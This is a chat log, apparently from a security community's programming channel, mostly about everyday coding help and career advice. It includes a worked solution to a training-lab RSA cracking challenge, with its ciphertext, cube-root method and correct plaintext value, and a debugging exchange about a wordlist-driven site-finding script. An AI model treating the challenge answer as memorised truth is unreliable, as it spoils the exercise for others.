    request_class = Request(args.wordlist,args.amount,args.extension)
    request_class.check_dependencies('pip','requirements.txt')
    request_class.site_finder()

requests.exceptions.ConnectionError: HTTPSConnectionPool(host='google%0a.com', port=443): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f7651801760>: Failed to establish a new connection: [Errno -2] Name or service not known'))

why does does it add %a at host='google%a.com'

should only be google since i only have google in my specified wordlist

U need to strip the \n

Looks like you’re not stripping endlines from the read lines

oh

strip where?

Please use the real requirements.txt system rather than that function

alright

thx for the help

When you’re reading lines from the file.

can you point out where?

i cant point out where specifically

fuck im so stupid

lol

If you didn't see it after that, it's the line with for i in open_file:.

i forgot the .read()

and .split()

jesus

I'd also suggest to not reuse identifiers within a scope, it makes the code pretty hard to follow. There's two nested loops that both have i (which also traditionally refers to an index, but at least the outer loop gets a line from that file)

alright thx dude

Gave +1 Rep to @solar hull

You can use that for i in open_file: as well - it will give you lines, and not read the whole file into memory at once. Just remember to strip() the resulting strings.

silly question, anyone try implementing a 2FA prompt in deno here?

What would be the best website (free) be to learn python?

Sololearn is pretty ok

Will check it out thanks

Hey everyone I am having and issue with Python coding and cannot figure out what the issue is.
I am trying to run this code:

exec(output)```
But for some reason I only get a blank new terminal to open and it doesn’t execute the command. Is this something with SSH and Python?

Why are you using gnometerminal?

More or less from old habits lol. Any recommendation?

You're using bash

What would be your recommended edit?

just call sshpass directly?

I am also trying to open it in another CLI

If I remove bash the new terminal opens, but then shuts down immediately

@onyx merlin I'm looking to start learning GoLang, judging by your Github you're a pretty big fan

do you have any pointers on how to start with it, from your personal experience?

build a project

I've heard the 'build a compiler in go' book is pretty good. And another one by the same author, I think.

https://smile.amazon.com/dp/B07FZWWVQT and https://smile.amazon.com/dp/B01N2T1VD2

I'll have a little read through them

now to generate ideas for projects

This should probably get a pin: #programming message

i'm using wtforms to handle the forms in my flask webapp, is there any way to add a class to an input?

in the template it's used like

{{ form.username.label }} {{ form.username }}

and if i were doing custom css, i could just wrap that within a div and access it like that, but since i'm using a css framework, i need to give the input tag a class

non helpfull advice here: use react

nvm found it

can one pls translate this js into python

tasks.filter(task => task.category === "Design")

🥺

nvm

hi

Disregarding nvm, wouldn’t that be... list(filter(lambda task: task.category == ’Design’, tasks))

i made a dir "bin" in /home/noboe and addded it in my PATH but i cant run any script saved in bin just by wrting the filename in the cli, i have to write bash /bin/<filename>

made the file executable

even added the new PATH in .bashrc

¯_(ツ)_/¯

But have you refreshed your terminal session

what do u mean i m sorry i dont understand

u mean like close it and open it again?

Don't worry it should be working tbh

I just tested it locally and it was working alright

should just be a case of doing PATH=<location>:$PATH

oh actually its working now when i did source ~/.profile

when i read the contents of .profile earlier it had a line saying if the host makes a private bin directory in $HOME then PATH=<location>:$PATH

wonder why it didnt work

source updates it or something?

ugh

i have to write source ~/.profile everytime i open a new terminal

In my degree path we've gone over the basics of Assembly and now we're going into Python, SQL, Java, C++, and then rounding it all out with actual projects that will require the use of all/some of those languages. My question is: I am very interested in low-level programming/exploitation, would it be worth it to do a deep dive into Assembly after we finish those other languages in order to get a better understanding of what's going on in there?

For some more context, it's a Security Engineering degree, the projects range from building a web application to reverse engineering, solo and group. I really don't know how useful a firm understanding of Assembly would be.

If you want to do a lot of reverse engineering, my guess is it would be very useful.

If you're more interested in just doing software development, hardly anyone writes in raw assembly anymore. That's a very niche job.

True. I want to start in software development and work my way into security (we've been warned multiple times not to take this degree and assume we're super l33t hax0rs), it would probably be better to focus on development for now then. I can study Assembly once I've landed myself a job and have more freedom to study what I want. Thank you for the reply @mortal flint

Gave +1 Rep to @mortal flint

Assembly is a 1:1 translation for native machine code. Understanding what ASM does gives a much deeper understanding of execution. If you want to do exploit dev, this would be really useful. In my opinion, its impossible to be a really good programmer without understanding underlying code execution.

If you really want to write assembly for a living, I'd look at embedded device manufacturers- IoT devices, industrial automation, that sort of thing.

Check when ~/.profile is read, and see if there's another file that might do the trick instead.

Most of those jobs don't do ASM any more, Empty. Almost all robotics dev jobs I've seen use cut down versions of C or C++ and something like the Keil IDE. Industrial automation might, but with the increased awareness of how bad IA security has been historically, that is changing.

yeah, agreed. That's why I said it's a very niche job these days

Robotics and unmanned vehicles is one of the fastest growing areas of research - very difficult to break in without EE/ME and CS combination though

But brockfu, I also agree with juun about knowing assembly making you a better software engineer. I haven't touched assembly in a LONG time, but I still refer back to lessons I learned from that

As a security engineering degree holder though, I could see that being pretty valuable, to the right companies

Primarily DARPA and NSF funded in the US, but there are private companies doing research as well.

@magic falcon Thanks for taking the time to write that out! We've gone over the basics of Assembly, essentially how we go from high-level to communicating with the hardware, they made sure we understand how it all works (hardest exam to date). You would say it's definitely worth going beyond that?

Gave +1 Rep to @magic falcon

I've never worked harder for fewer lines of code than while writing assembly

If you want to understand how to properly optimize code, or tune algorithms for performance, I think it's a prerequisite. Writing assembly can be fun... debugging it, not so much. That said, there are pay offs from changing the way you think about software - this is one way to change your thinking.

Part of the process of optimization process, though, is also understanding how compilers work, and the various costs associated with allocation, deallocation, and memory lookups at various hardware levels.

So ASM helps, but it isn't the complete picture

If you enjoy it, then sure, it's worth learning more. The question of how to turn that into a job/career is a bit harder.

Got it. I've already got a firm grasp of Python, so while we're going over that I'll study up on ASM.

Thank you guys for your help. @mortal flint I plan on starting out as help desk, then looking into jr dev positions once I feel confident, and then working my way into security. I'm a vet, still hold a security clearance, have Sec+, so I'm going to leverage that in the job search while going to school.

Gave +1 Rep to @mortal flint

honestly, I would say help desk is probably aiming a bit low, given your degree

or are you talking as a internship before graduating?

don't have the degree yet, I just finished my first year. i'm going online, so a day job is feasible. I was an Infantryman in the Army, so I don't have any professional IT experience, I figured it'd be best to start at the bottom and work up.

If I'm able to find a jr dev job before then, then of course I'd take that.

DM me 🙂

but yeah, I think you could easily get a junior dev position somewhere, even as an intern

Working help desk part time whie you focus on the degree is a solid way to start - don't skip out on taking an internship though. Don't be afraid to branch out and learn infrastructure as well. I firmly believe in having a T shaped skillset, and having breadth and depth of knowledge is a huge advantage.

100% agree. Something else- college time is the perfect/best time to go do as many different internships as you can. Good for the resume, but also helps you figure out what you like and don't like

And don't take any unpaid internships.

nobody cares about short-term jobs while you're in school, but a lot of job hopping later can be harder to explain

If the company doesn't value your time enough to pay you, it doesn't bode well for how they treat long term employees.

I think I got my first internship summer between year 2 and 3, and was making pretty good money even then

Ideally, an internship is a low-risk tryout for both intern and company. The intern gains perspective and should be contributing more than just low-value grunt work. The company should be evaluating the intern as well, for attitude, work-ethic and ability to say 'I don't know, let me do some research' where appropriate.

One mistake I made, was not pursuing internships and instead working higher paying but ultimately dead end jobs during breaks and part time during the school year. It made my job search a lot more difficult. Another mistake I made was neglecting my social network - every IT job I have had, I found through my social network and friends vouching for me to their org.

Something like 85% of placements are the result of internal recommendations, so being a good friend outside of work can go a long way to landing that dream job.

I'm guessing most places don't post internships on like, ziprecruiter lol. How do I go about looking for these?

Although at some point, LinkedIn becomes a much easier way, at least in my experience

actually, lots of companies do. That's how I got my first internship, way back when

went to the company's job board site

Talk to your university, go to local meetups, call the HR departments of all the tech companies you want to work for.

the other option, if you know of a company you really want to work for- find an HR person or a manager, write them a nice email, explain who you are, your skills/interests, and see if they might be able to make a position for you

as an intern, that's usually not too hard for companies to do

Universities have a placement percentage they use as a selling point - helping you find a job helps their number. The student union and career center may have dedicated resources for leads.

yeah, big universities have a dedicated career office/person

Also check with your professors, instructors and support staff of your uni department. They may have other resources to call on.

ah, good point

I would say that any university with more than 5000 students should have a career center. It doesn't have to be a big uni, either. IIRC my community college had some resources like that as well.

yep, CC's usually have something, just not as big/well resourced.

But I like the 'talk to your professors' thing- they have their own networks, and get contacted by people looking for good talent.

After some light digging I've realized that my degree program has a dedicated federal work-study program that I can join.

awesome 🙂

Not going to lie, I've actually ignored this resource page this entire time lol. I really do appreciate all of the help and advice. Means the world to me, you have no idea

@inland vessel here ya go

What are the ways to recover the encrypted text in this chunk of code? It should be a five letter word ```py

Decrypt 344, 184, 130, 662

block1 = pow(344, 411, 667)
block2 = pow(184, 411, 667)
block3 = pow(130, 411, 667)
block4 = pow(662, 411,667)
print("Decrypt 4 blocks: \n",block1, block2, block3, block4)```

Where'd you get this?

Yeah, feels like there's a lot missing, both in code and in context

any python3 experts ? I have very-large-number**(1/3) and python seem to be able to calculate it fine. I do however need the result in hex but when putting it through the existing hex() it only returns hex for half of it and 00 for the rest

very-large-number = 100 digits

@onyx merlin sorted

Nope nothing's really missing

411 is an exponent and 667 is a public key value

Did you try converting it back to decimal? The output hex might be the real value for that integer.

the resulting hex is actually a string and I know that it is not correct.

so running the hex result through e.g. cyberchef "fromHex" will reveal a flag.

https://www.rapidtables.com/convert/number/hex-to-decimal.html This can help.

this would be the number 14887716705766614226302331656748546195328906880296894322596715261404953788693951344841626882745910926946567107240171862117**(1/3)

or rather the result of that would be the number.

then this huge float should be converted to hexadecimal and from there to ascii

If you have to convert the hex to ascii, then you can use CyberChef

that part is not the problem. problem is that python cannot handle the large result from the calculation when converting it to hex

Hexadecimal for the result of 14887716705766614226302331656748546195328906880296894322596715261404953788693951344841626882745910926946567107240171862117**(1/3) is 0x484b4e7b6259c400000000000000000000 according to python. Converting 0x484b4e7b6259c400000000000000000000 again to decimal is giving the same integer, which means Python is able to handle the conversion.

no it just means that the result is not correct 🙂

What output does online converter give?

0x484b4e7b6259 <-- this part is correct.

rest is not

if you convert it in e.g. cyberchef you should (with the correct result) get a flag string like HKN{bY........}

.... being the part missing due to the problem with python rounding error

That might be possible. Is this a part of room/challenge?

not from here.

from a local training system. It is part of a "crack the RSA" challenge room.

Ah, I See.

The issue is with the cube root. Computers have issues with calculating float.int((mynum**(1/3))**3)==mynum returns False.

yeah an numpy.cbrt() gives same problem.

btw: the correct result should be 24600430019675053398291607284547696341373

this tool can do the calculation https://www.dcode.fr/cube-root

How to find the ip address of the google meeting in which we are connected

....and why would you want to do that?

no

ended up coding a newton approximation for the cube root problem. that gave me the right answer streight away

Hello dear programmerz

Asking again, where did you get this challenge from?

It's a lab exercise

From where?

I'm guessing no-one can help 😦

Certainly not without telling us where it's from

Sounds like it's a homework problem. Or at least, that's what I think when I hear lab exercise.

If it's set by a college/university/school, talk to your teacher

I don't know where its from.. anyway what if you wanna recover words from different values in the blocks, such as: 200 300 400 500 with exponent of 20 and private key of 60 and has been encrypted two characters at a time with space in between?

You said it's a lab exercise

So what lab?

Where did you get it from?

Yeh it's a class lab exercise

Go and ask your teacher then, that's your best bet. They're paid to answer your questions.

"encrypted" may not mean what you think it means here. We'd need to know more about the algorithm

Mhm let's say its RSA algorithm

Then there's probably plenty of resources in your textbook or google that can be more helpful than we can

I just need someone to look at where I'm going wrong in this.. I've got an answer when I computed the value but don't know if its the actual encrypted word or not

So if you're using an RSA algorithm, then there should be ways of confirming input and outputs, right? Should be an easy way to check your work

sounds like you're being asked to re-implement RSA, yes?

Nope, not that I know of no

A quick google turned up a few examples. That might enable you to verify if your algorithm is correct given those inputs.

But if it's coming from a homework assignment, I'd be willing to bet there's an example included there as well. If not, ask your instructor for an input/output to test against

kristine puts NOK 1,200 in the bank. The annual interest rate is 2.1%. How long before that amount grew to over NOK 2,000. How can I calculate it using python?

This sounds like a school assignment

It is lol

Then you should probably ask your teacher first

We do these type of questions using pen and paper but I just wanted to know how i could do it using python. We don't have python right now in school

I can program how much income will be in a year but i dont know how should i check for when she haves 2000 nok

you have the formula for calculating the amount based on time, right?

rewrite the equation so that you solve for time, given a known amount

hey, im so sorry for bothering anyone but is it possible to ceate scripts that can prevent threats towards my pc in python?

Oh nvm I got it. I did a while loop that calculated every year, and specified else to print years when she got 2000 nok

probably not the most efficient way to go but it works so its fine.

Can you be more specific? that's a really vague request. Putting credit card info into a website could qualify as a threat.

what i mean is, can u make a script that prevents individuals from like booting you off?

using python

cant forget that

Define the attack vector; monitor attack vector; react to attack vector.

What you are talking about, in my reading of it, is behavioral analysis to differentiate between good and bad behavior. It's possible, but that won't be an easy thing to do without a suitably large sample size.

yea now i think about it, u have a point

but ima still try

You are going to take the crazy train for a wild tour of your codebase. There is as lot of things I don't think you've considered about what constitutes 'good' or 'bad' behavior within the system. Are you already an expert at log analysis?

i have no clue about this tbh

well ive had 4 years of programming experience

No, you can't

It is possible to, if you control all the infrastructure. But stop annoying script kiddies.

i just learned why you shouldn't sum a list with range 1, 1_000_000_000

in hind sight, i should google stupid questions like that

I'm just gonna leave this here... https://muirlandoracle.co.uk/2020/01/29/rsa-encryption/

Quick question: What is the best (not necessarily easiest) programming language to learn first? Goal: computer programmer

In other words: Which would get me the farthest?

IMO, C is pretty great. It will give you a deep understanding of how memory allocation works. It's still used in embedded programming and other middle level stuffs. And after that you can easily learn other languages.

And it’s awful for beginners.

So if you like to jump into the deep end and learn that way, c is fine. But if you like to learn concepts, e.g. Python is a better choice.

Just don’t think getting along with a single language is the way forward. But learn first, then look at other languages.

Thanks! (much appreciated...)

Gave +1 Rep to @hearty estuary

I am actually learning python already so, yes,... and the advise for learning more than one language is also great... thanks. That is where I was wondering which next language to learn. C right?

Well C gives you some context that was stated out above 🙂 Either go that way with C, or go with a more managed language like Rust, or get into a higher level e.g. Go.

https://tenor.com/view/boy-kid-computer-thumbs-up-face-gif-9548945

Thanks...

One more question (for now): What is a good course to take if I want to go down the road of becoming a Ethical-Hacker / Pentester?

*course or courses...

And where should I start?... (you can always answer my questions tomorrow (if you don't readily have the answer right now...(I don't want to keep anyone up answering a question that has a lot of complexity 😬 😬 😋 )))

I explain the code here and the maths behind it if you're super lost https://skerritt.blog/how-does-public-key-cryptography-work/

assembly. When you are comfortable with that you will be able to learn all other programming languages (maybe except for the stupid Functional langurages) in a short time.

Is it easy to learn Python if you are famililiar with C/C++?

not quite what I'd recommend...

probably go with C though, as you're basically a short step up from assembly there

but with a sane syntax and not having to look though the reference manuals to get anything done

Yeah c is the way to go. My point was. Start low and the higher abstractions will be easy

anyways, functional languages have their place

done properly, they can make code much easier to read/understand

How to properly setup kali linux with wlan option and root terminal instead of kali@kali

-ban @daring prism Ban evasion

🔨 Banned techreekz#2331 indefinitely

Partly that depends on your career goals as well. But I'd recommend java as a good starting point. It's not as hard to pick up as c/c++, but it's more rigid and structured than python, which is a bad first language, imo, because it allows/encourages bad programming practices.

jtfrn iktgmf jrfm

?

Or start low, lose motivation as it's too hard to get any visible results 🙂 I've seen that happen way too often.

Then programming is not for you and you should go for Web markup instead 😉

I hope that's a passive you, having worked as sw engineer for twenty-some years 😄

Yeah

<- 20+years of low-level programming here

Anyway, don't do as I did, and start with some dialect of basic in the eighties.

lol

I think C was my fifth or so programming language back in the days.

syntax is not the point here tbh. the point is understanding programming paradigm and logic. Doesn't matter what language u use. in this day and age requirement dictate language and its ok cause it's just syntax.

Definitely. And for most of the parts, C syntax and having to think about memory management is a blocker for learning that stuff.

i would suggest start with any OOP language .. so not necessarily C. maybe java cause of the garbage collection.. cause actual application is written in oop style paradigm.

When you need to learn about manual memory management, you'll get there.

100% agree to that. u don't need to learn memory management at the start.

And C is bad for learning about data structures.

...and algorithms 🙂

yes!! exactly.

creating data structure for learning is good. but what happens ur data structure is a little complex .. where u need to use some smaller basic lavel DS inside? that's when C become tedious as heck

again it's my experience and opinion. it may be wrong or right.

It's possible, and if you can handle the loops you have to jump through implementing those in C, you're probably good for any other language. But it's hard.

yeah it's plain tedious to do. it's not impossible. not even close to impossible for that matter

one of the things i have seen is that ppl who are very into the procedural programming have very hard time porting into OOP

i mean i had to reject dozens of ppl for that.

You are/have been a hiring manager?

i am one of the interviewers for app dev hiring.

and not going to lie, changing that mindset from just doing one very large program to making object and implementing design patterns and applying it to make software is tough

mmh.

C/C++ memory management is something that a lot of people struggle with, especially as a new software developer. Python is too unstructured and "anything goes". For me, Java is the best language to start learning from these days, and it's also still in high demand in enterprise.

yeah lol java is like the most in demand for backend even now. it surprises me

no surprise- it's a powerful tool, and there's a lot of talented people with that background

Looks like Rust and Go are the go-to languages for new projects in my corp. I've seen at least Python, Java, C, C++, JS and Elixir used.

I think languages like scala, rust, and go are more "fad" languages. Not that they don't have their uses, but it's a pretty niche market, and that means they tend to fade away

I see quite a big push in Rust replacing C.

i am using go in the backend for my current project. it's kinda cool even though syntax is very weird.

And well, Go is great for doing command line applications and web backend.

You might actually have a valid point there (w/r/t rust replacing C). I haven't done a lot of C work, and not in a while.

I toyed with Go. Didn't see the value

from an enterprise app perspective c doesn't have enough support.

it's there. but the best practices are still evolving

like as of now ppl are using interface and structs replacing normal classes .. and that's kinda hassle sonetimes..

Also: Java has improved a lot in the last few years. Even the syntax is evolving, which it didn't do a lot up until java 7 or so.

You get rid of a lot of boilerplate stuff with the new constructs.

yeah goddamn ppl are using functional java with lamda .. i am like what the actual heck

it is becoming like scala

I don't use the lambdas and streams much. Probably should get better at that. I kinda don't like the new 6 month release cycle. 12 would be better

lambda good. The functional parts are a bit... meh 🙂 I can understand the reasoning for the design choices (e.g. you can't throw exceptions from stream handlers), but it's sometimes rather tedious to work with those.

But so many people are still on java8, which is over a decade old now?

Well it's a 2,5 years or so for LTS releases, it's not that bad.

my main stack was never java related so when i fiddle with java code i get very shocked

oh no

But oh god when you switch between JS and Java, and have lambda syntax change from -> to =>

why would you switch to java?

Because it's a damn powerful language to work with. It works for large systems.

Try working with half a million LOC in JS, will you? 🙂

hmmmm

would prob use a functional lang

Try finding 50 engineers fluent with functional language paradigms and large systems design with those

eh why? it doesn't make sense sometimes to use functional lang. also the best practices are very scattered

Elixir gang rise up

from strictly functional programming perspective i think scala is still no 1 in terms of usage

usage and adoption, probably.

yeah. cause very big framworks are created for scala. one of them is probably gatling the de facto standard for performance testing.

well scala isnt like the best paid framework?

wdym paid?

and wdym framework?

lol

umm Ijust heard the name scala

in stack overflow

scala is a programming language running on JVM.

some people were discussing the salary for someone that knows scala

oooh

just google searched

haha

it runs on js too

Oh, I have a friend that does his daily work in clojure.

ts support nice

hm, what runs on js?

https://www.scala-js.org/

lol believer u are confusing something i am pretty sure

oh, there's a scala.js. what the.

I think im right here

Looks like cross-compiling scala code into js. Which doesn't make a lot of sense to me 🙂

Im a pretty newbie dev plz forgive me senpai

leggy also helped me learn js

ty @tepid cargo

Gave +1 Rep to @tepid cargo

leggy senpai

lol it's kinda interesting. probably not that usable

yes potato-san

u learned it urself cause well u started to learn js like crazy.

soooo umm it seems that it is wrapper around es6 who doesn't want to learn JS

can basically use scala's syntax

so freaking confusing

wrapping on js

well, most of JS is transpiled nowadays

it is but not in this way

also I doubt how efficient it is transpiled

Not quite, but it's not a huge leap.

wdym? atleast in the recent browsers and newest node versions more of them are not transpiled.

but for frontend it is.

cause react/angular both gets transpiled into es5-6

I meant the browser part, yep.

And then again, if you're working on TS, it's transpiled into ES